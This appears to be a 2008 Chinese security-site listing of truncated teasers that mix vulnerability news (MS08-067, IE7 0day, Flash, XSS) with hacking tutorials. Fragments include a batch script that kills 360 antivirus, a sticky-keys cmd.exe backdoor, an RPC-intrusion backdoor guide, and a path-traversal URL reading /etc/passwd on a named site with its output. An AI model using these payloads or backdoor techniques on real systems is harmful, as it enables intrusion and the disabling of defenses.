网吧的人多了，管理也难了，于是网吧管理软件也来了。网管软件来了，于是网管就轻松了，每天打开电脑，启动软件，仿佛也就没事了。不过真是这样吗?也许只是轻点几下鼠标，就会找到几个漏洞，网管软件也就如玻璃般的碎掉。不信?现在网吧的管理员大多使用诸如《美萍》之类的网吧管理软件来管理系统，同时还通过修改系统注册表的方法来禁止用户进...

[阅读全文]

微软发布了针对IE浏览器漏洞的最新补丁MS08-078，这是该公司今年第二次打破常规发布紧急漏洞补丁。瑞星旗下卡卡上网安全助手也进行了紧急升级，非正版软件用户可以用瑞星卡卡（http://www.skycn.com/soft/23234.html　）来弥补这个系统漏洞。据国外媒体报道，自12月9日该漏洞出现实际攻击案例...

[阅读全文]

12月27日，一个名为“IE7攻击代码(Hack.Exploit.Script.JS.Agent.ic)”的恶意代码本周特别值得注意,它自上周出现后,疯狂势头一直未减。根据瑞星“云安全”系统提供的数据,每天有22万例网络攻击利用该漏洞进行,占据总体网络攻击比例的50%以上...

[阅读全文]

拿到一个“半成品”样本，病毒在文件属性中假冒360安全卫士，但图标明显不对。　　　　运行后，还会假冒毒霸的病毒警告：　　　　这里看一下正常的毒霸实时监控发现病毒时的窗口：　　　　伪造的还挺象那么回事儿，只是文字太多露出马脚。　　这个窗口也是那个木马伪造的：　　　　病毒的窗口点击后，会访问一个钓鱼...

[阅读全文]

曾几何时，冲击波病毒在一周内攻击了全球%60的Windows用户，使受害者电脑反复重起。而如今Ms08-067漏洞的出现，很有可能会赶超冲击波病毒，目前有不少菜鸟也已开始对其漏洞实施攻击了，因此受此漏洞危害的用户将会越来越多，下面笔者将会客串一把黑客，来玩玩这风靡全球的Ms08-067漏洞，同时还将会把其防御措施&ld...

[阅读全文]

什么是粘滞键？　　当你在Windows操作系统里面连续按下5次Shift键之后，你看看出来了什么？　　在windows2000/xp/Vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开she...

[阅读全文]

看到网上有人发的杀360的bat，用了感觉不太好，此代码是重写的，非网上找的那些垃圾代码！欢迎测试，不好用也不要拍我砖！毕竟360也会更新的！cls@echooncd"%ProgramFiles%\360Safebox\Update"ifexist"safeboxup.exe"(safeboxup.exe)taskki...

[阅读全文]

一、事件说明发布时间：2008-12-09受影响的软件及系统：MicrosoftInternetExplorer7微软IE7浏览器被发现存在一个严重0day漏洞，HTML文件中错误格式的标签可以导致微软IE7浏览器使用已被释放的对象的内存作为虚函数指针进行调用。成功利用该漏洞可以执行任意代码。该漏洞是一个“...

[阅读全文]

根据安天防线团队研发人员的分析，IE70Day漏洞的危害性极大，以下是0DAY代码片断：溢出是由于XML解析字符串SRC片段时导致，由于SRC字符串当中的rਊr非正常字符导致对象分配失败，而失败后的内存指针没有被释放，继续利用，而这个指针被人为指向了一段堆地址，而如果这段地址被ShellCode覆盖过的话，...

[阅读全文]

自从微软发布WindowsVista操作系统后，人们对该系统的各种负面评论一直没有间断过。其原因之一便是WindowsVista中存在着很多安全缺陷，使其比较容易受到病毒、木马或黑客的攻击。当然，WindowsVista并不是唯一受安全问题困扰的操作系统。在今年5月，Linux曾经爆出一个巨大的安全缺陷，而且据说其安全...

[阅读全文]

前几天客户进行接口业务迁移，迁移之前客户要求对接口机到新业务服务器的网络路由进行检查，为顺利迁移做好准备。当时快下班了，就只进行了ping测试，结果如下：接口机#ping172.25.13.2PING172.25.13.2(172.25.13.2)from10.246.81.5:56(84)bytesofdata.64...

[阅读全文]

为了测试这个，我装了三个虚拟机。。。一两个XP一个2003，终于弄明白都需要哪些必要条件了，写出来和大家分享，希望对离成功还差一步的同学们有所帮助，感谢幻影的牛人放出MS08-067的Exp，自由，共享。经过N+1次的测试之后发现，本机和目标机必须要开启以下服务，否则就算对方没有打补丁也会失败。Server、Compu...

[阅读全文]

受影响系统：AdobeFlashPlayer9.0.124.0描述：FlashPlayer是一款非常流行的FLASH播放器。AdobeFlashPlayer中的ActionScript对FileReference上传API的FileReference.browse操作或FileReference下载API的FileRe...

[阅读全文]

#!/usr/bin/perl-wnetcat.pl#Writtenby:BrandonZehm##License:##netcat.pl(hereafterreferredtoas"program")isfreesoftware;#youcanredistributeitand/ormodifyitunderthet...

[阅读全文]

10月28日消息，互联网搜索公司Netcraft的工具条检测到雅虎网站有一个跨站脚本安全漏洞。利用这个安全漏洞能够窃取身份识别cookies。　　Netcraft公司的PaulMutton本周一在博客中说，这个安全漏洞存在于雅虎HotJobs搜索引擎网站。黑客在这个网站上嵌入了恶意的JavaScript代码。　　Mut...

[阅读全文]

文章来源:搜狐IT国外媒体报道，GoogleG1手机正式上市还没几天，一些安全专家就表示已经发现了严重的安全漏洞。　　安全专家CharlesA.Miller表示，本周早些时候就已经将所发现的漏洞通知Google，现在告诉广大用户的目的在于让大家意识到在越来越复杂的智能手机中将会面临和个人计算机同样严重的安全问题。　　曾...

[阅读全文]

RPC漏洞入侵并打造完美后门来源：Cn.yiyl'Blog防御办法：安装rpc补丁使用防火墙过滤135，445，139等端口RPC漏洞入侵并打造完美后门！现在网上很流行dcomrpc，哈哈，那好就说说利用dcomrpc入侵。和入侵之后做的事情。需要的工具：很好的：　radmin.exe扫描工具:retinarpcdco...

[阅读全文]

WritedBy樱木花盗Blog:www.03389.comAdmin@03389.com为了测试这个，我装了三个虚拟机。。。一两个XP一个2003，终于弄明白都需要哪些必要条件了，写出来和大家分享，希望对离成功还差一步的同学们有所帮助，感谢幻影的牛人放出MS08-067的Exp，自由，共享。下载：MS08-067.r...

[阅读全文]

近期微软爆出四年以来最严重的安全漏洞，赛迪网安全频道特邀请安全专家张晓兵撰文，为大家解读此次微软MS08-067漏洞，并针对于此给出了全面的解决方安全案。第一部分：MS08-067漏洞与趋势分析2008年10月23日，微软爆出特大安全漏洞，几乎影响所有Windows系统，强烈建议广大用户及时下载安装该漏洞补丁。成功利用...

[阅读全文]

26日晚，据知情人透露，金山打败瑞星，成功与微软联姻。微软近日也将正式对外宣布与金山毒霸进行战略合作，共同整治通过MSN进行传播的病毒。　　MSN用户长期以来备受病毒困扰，一年前，微软MSN曾携手国内三大安全厂商瑞星、金山、江民，共同呼吁用户建立正确的网络安全行为习惯，并曾经提出六条安全守则，建议用户养成自我保护的安全...

[阅读全文]

文章来源:搜狐IT国外媒体报道，GoogleG1手机正式上市还没几天，一些安全专家就表示已经发现了严重的安全漏洞。　　安全专家CharlesA.Miller表示，本周早些时候就已经将所发现的漏洞通知Google，现在告诉广大用户的目的在于让大家意识到在越来越复杂的智能手机中将会面临和个人计算机同样严重的安全问题。　　曾...

[阅读全文]

作者：Mob　　WindowsXP安全更新程序(KB958644)　　发布日期:2008/10/23　　下载大小:634KB　　现已确认有一个安全问题，未通过身份验证的远程攻击者可能会利用此问题危及基于MicrosoftWindows的系统的安全并获取对该系统的控制权。您可以通过安装本Microsoft更新程序来保护计...

[阅读全文]

10月24日，瑞星公司发出安全警报，微软系统爆出2008年最大的安全漏洞（KB958644），影响包括WindowsXPSP3、Windows2000、WindowsServer2003、WindowsVista等几乎所有主流操作系统。黑客可以利用此漏洞发动大规模远程攻击，实际效果可与“冲击波”...

[阅读全文]

10月22日，瑞星反病毒监测网发现，大智慧实时行情页面（h**p://cgi.gw.com.cn/cgi/**.asp）被黑客植入木马，多个引用此页面的财经网站和炒股客户端因此带毒，用户浏览这些财经网站后，就会被木马入侵，可能丢失网游账号、网银帐号等。　　由于此次带毒事件正处于股市开市期间，可能给股民造成重大影响，针对...

[阅读全文]

http://www.vidiauto.com/off_record/index01.php?id=../../../../../../etc/passwdroot:/bin/bashdaemon:x:1:1::/:bin:x:2:2::/usr/bin:sys:x:3:3::/:adm:x:4:4:Admin:/va...

[阅读全文]

据国外媒体报道，GoogleG1手机正式上市还没几天，一些安全专家就表示已经发现了严重的安全漏洞。　　安全专家CharlesA.Miller表示，本周早些时候就已经将所发现的漏洞通知Google，现在告诉广大用户的目的在于让大家意识到在越来越复杂的智能手机中将会面临和个人计算机同样严重的安全问题。　　曾是美国国家安全局...

[阅读全文]

动网真可谓是“洞网”啊，大小漏洞层出不穷!版本从6.X升级到了7.0.0，安全上可谓是重上加重，可惜，前不久又出现了upfile.asp上传任意文件的重大漏洞，而且在7.0.0SP2以下通杀!那SP2上有这个漏洞没有呢?用过臭要饭的写的upfile.asp的利用程序的朋友都知道，如果是动网7SP...

[阅读全文]

漏洞页面是\include\inc_bookfunctions.php触发页面是member/story_add_content_action.php接着就是打开下面的地址：http://www.xxx.com/member/story_add_content_action.php?chapterid=1&ar...

[阅读全文]

盗版，对大多数软件开发者来说都是一个令人担心的问题。在采用了加密锁加密后的软件会不会被黑客破解呢？理论上说没有不能破解的软件，即使是纯数学的密码加密也有被破解的可能，只不过破解的时间可能是个...盗版，对大多数软件开发者来说都是一个令人担心的问题。在采用了加密锁加密后的软件会不会被黑客破解呢？理论上说没有不能破解的软件...

[阅读全文]

自微软官方宣布仅在中国大陆地区进行正版验证计划后，一些使用非正版WindowsXP和Office办公软件的用户都在为“如何才能彻底防止”黑屏想办法。对此，已经有网友给出了解决办法，那就是在控制面板中关闭自动更新，还有就是将相关微软产品的“用户体验”关闭。　　但事实上，如果...

[阅读全文]